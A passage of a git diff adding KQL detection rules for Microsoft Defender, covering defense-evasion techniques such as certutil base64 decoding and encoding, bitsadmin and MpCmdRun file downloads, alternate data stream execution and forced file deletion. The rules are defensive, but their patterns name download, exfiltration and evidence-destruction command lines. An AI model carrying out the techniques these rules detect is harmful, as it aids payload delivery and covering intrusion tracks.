EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files + +DeviceFileEvents +| where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql b/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql new file mode 100644 index 00000000..2747b280 --- /dev/null +++ b/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql @@ -0,0 +1,12 @@ +// Title: Exchange PowerShell Cmdlet History Deleted +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-26 +// Level: high +// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - Possible FP during log rotation + +DeviceFileEvents +| where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql b/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql new file mode 100644 index 00000000..c56afa86 --- /dev/null +++ b/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql @@ -0,0 +1,12 @@ +// Title: Execute Files with Msdeploy.exe +// Author: Beyu Denis, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects file execution using the msdeploy.exe lolbin +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - System administrator Usage + +DeviceProcessEvents +| where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql b/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql new file mode 100644 index 00000000..762f9ccb --- /dev/null +++ b/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql @@ -0,0 +1,10 @@ +// Title: Execute From Alternate Data Streams +// Author: frack113 +// Date: 2021-09-01 +// Level: medium +// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents +| where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql b/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql new file mode 100644 index 00000000..39609343 --- /dev/null +++ b/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql @@ -0,0 +1,12 @@ +// Title: Execute Pcwrun.EXE To Leverage Follina +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-13 +// Level: high +// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql b/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql new file mode 100644 index 00000000..1919c3e5 --- /dev/null +++ b/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql @@ -0,0 +1,10 @@ +// Title: Execution DLL of Choice Using WAB.EXE +// Author: oscd.community, Natalia Shornikova +// Date: 2020-10-13 +// Level: high +// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql b/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql new file mode 100644 index 00000000..7da04081 --- /dev/null +++ b/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql @@ -0,0 +1,10 @@ +// Title: Execution Of Non-Existing File +// Author: Max Altgelt (Nextron Systems) +// Date: 2021-12-09 +// Level: high +// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql new file mode 100644 index 00000000..2a81c7e2 --- /dev/null +++ b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql @@ -0,0 +1,12 @@ +// Title: Execution of Suspicious File Type Extension +// Author: Max Altgelt (Nextron Systems) +// Date: 2021-12-09 +// Level: medium +// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. +This rule might require some initial baselining to align with some third party tooling in the user environment. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath contains "\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql b/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql new file mode 100644 index 00000000..a2492d3d --- /dev/null +++ b/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql @@ -0,0 +1,12 @@ +// Title: Execution via stordiag.exe +// Author: Austin Songer (@austinsonger) +// Date: 2021-10-21 +// Level: high +// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of stordiag.exe. + +DeviceProcessEvents +| where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql b/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql new file mode 100644 index 00000000..cd379a4a --- /dev/null +++ b/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql @@ -0,0 +1,12 @@ +// Title: Execution via WorkFolders.exe +// Author: Maxime Thiebaut (@0xThiebaut) +// Date: 2021-10-21 +// Level: high +// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of the uncommon Windows Work Folders feature. + +DeviceProcessEvents +| where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql new file mode 100644 index 00000000..fb82928c --- /dev/null +++ b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql @@ -0,0 +1,12 @@ +// Title: Explorer Process Tree Break +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber +// Date: 2019-06-29 +// Level: medium +// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, +which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and (ProcessCommandLine contains " -root," or ProcessCommandLine contains " /root," or ProcessCommandLine contains " –root," or ProcessCommandLine contains " —root," or ProcessCommandLine contains " ―root,")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql new file mode 100644 index 00000000..553e9771 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql @@ -0,0 +1,10 @@ +// Title: File Decoded From Base64/Hex Via Certutil.EXE +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2023-02-15 +// Level: high +// Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-decode " or ProcessCommandLine contains "/decode " or ProcessCommandLine contains "–decode " or ProcessCommandLine contains "—decode " or ProcessCommandLine contains "―decode " or ProcessCommandLine contains "-decodehex " or ProcessCommandLine contains "/decodehex " or ProcessCommandLine contains "–decodehex " or ProcessCommandLine contains "—decodehex " or ProcessCommandLine contains "―decodehex ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql b/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql new file mode 100644 index 00000000..93d5dc05 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql @@ -0,0 +1,12 @@ +// Title: File Deleted Via Sysinternals SDelete +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - Legitimate usage + +DeviceFileEvents +| where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_deletion.kql b/KQL/rules/Defense Evasion/file_deletion.kql new file mode 100644 index 00000000..e0470dc3 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_deletion.kql @@ -0,0 +1,12 @@ +// Title: File Deletion +// Author: Ömer Günal, oscd.community +// Date: 2020-10-07 +// Level: informational +// Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_deletion_via_del.kql b/KQL/rules/Defense Evasion/file_deletion_via_del.kql new file mode 100644 index 00000000..6509fdd5 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_deletion_via_del.kql @@ -0,0 +1,16 @@ +// Title: File Deletion Via Del +// Author: frack113 +// Date: 2022-01-15 +// Level: low +// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files. +Adversaries may delete files left behind by the actions of their intrusion activity. +Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " –f" or ProcessCommandLine contains " —f" or ProcessCommandLine contains " ―f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q" or ProcessCommandLine contains " –q" or ProcessCommandLine contains " —q" or ProcessCommandLine contains " ―q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql new file mode 100644 index 00000000..72b3577d --- /dev/null +++ b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql @@ -0,0 +1,11 @@ +// Title: File Download Using ProtocolHandler.exe +// Author: frack113 +// Date: 2021-07-13 +// Level: medium +// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql new file mode 100644 index 00000000..60f2f41e --- /dev/null +++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql @@ -0,0 +1,12 @@ +// Title: File Download Via Bitsadmin +// Author: Michael Haag, FPT.EagleEye +// Date: 2017-03-09 +// Level: medium +// Description: Detects usage of bitsadmin downloading a file +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 +// False Positives: +// - Some legitimate apps use this, but limited. + +DeviceProcessEvents +| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql new file mode 100644 index 00000000..6d1a44f6 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql @@ -0,0 +1,10 @@ +// Title: File Download Via Bitsadmin To A Suspicious Target Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql new file mode 100644 index 00000000..4892bb28 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql @@ -0,0 +1,10 @@ +// Title: File Download Via Bitsadmin To An Uncommon Target Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: medium +// Description: Detects usage of bitsadmin downloading a file to uncommon target folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql new file mode 100644 index 00000000..6bbcad20 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql @@ -0,0 +1,11 @@ +// Title: File Download Via InstallUtil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql b/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql new file mode 100644 index 00000000..97cd556e --- /dev/null +++ b/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql @@ -0,0 +1,12 @@ +// Title: File Download Via Nscurl - MacOS +// Author: Daniel Cortez +// Date: 2024-06-04 +// Level: medium +// Description: Detects the execution of the nscurl utility in order to download files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate usage of nscurl by administrators and users. + +DeviceProcessEvents +| where (ProcessCommandLine contains "--download " or ProcessCommandLine contains "--download-directory " or ProcessCommandLine contains "--output " or ProcessCommandLine contains "-dir " or ProcessCommandLine contains "-dl " or ProcessCommandLine contains "-ld" or ProcessCommandLine contains "-o ") and FolderPath endswith "/nscurl" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql b/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql new file mode 100644 index 00000000..06cccb70 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql @@ -0,0 +1,10 @@ +// Title: File Download Via Windows Defender MpCmpRun.EXE +// Author: Matthew Matchen +// Date: 2020-09-04 +// Level: high +// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql b/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql new file mode 100644 index 00000000..4b5e1ef3 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql @@ -0,0 +1,10 @@ +// Title: File Download with Headless Browser +// Author: Sreeman, Florian Roth (Nextron Systems) +// Date: 2022-01-04 +// Level: high +// Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "--headless" and ProcessCommandLine contains "dump-dom" and ProcessCommandLine contains "http") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")) and (not(((ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\MicrosoftEdge.exe") and (FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftEdge")) or (ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or FolderPath contains "\\Windows\\SystemApps\\Microsoft.MicrosoftEdge") and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\MicrosoftEdge.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql new file mode 100644 index 00000000..6671829f --- /dev/null +++ b/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql @@ -0,0 +1,12 @@ +// Title: File Encoded To Base64 Via Certutil.EXE +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-02-24 +// Level: medium +// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly + +DeviceProcessEvents +| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql new file mode 100644 index 00000000..5b328441 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql @@ -0,0 +1,10 @@ +// Title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_time_attribute_change.kql b/KQL/rules/Defense Evasion/file_time_attribute_change.kql new file mode 100644 index 00000000..82cf7ee8 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_time_attribute_change.kql @@ -0,0 +1,10 @@ +// Title: File Time Attribute Change +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: medium +// Description: Detect file time attribute change to hide new or changes to existing files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.006 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-t" or ProcessCommandLine contains "-acmr" or ProcessCommandLine contains "-d" or ProcessCommandLine contains "-r") and FolderPath endswith "/touch" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql b/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql new file mode 100644 index 00000000..33c61809 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql @@ -0,0 +1,10 @@ +// Title: File With Suspicious Extension Downloaded Via Bitsadmin +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file with a suspicious extension +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains 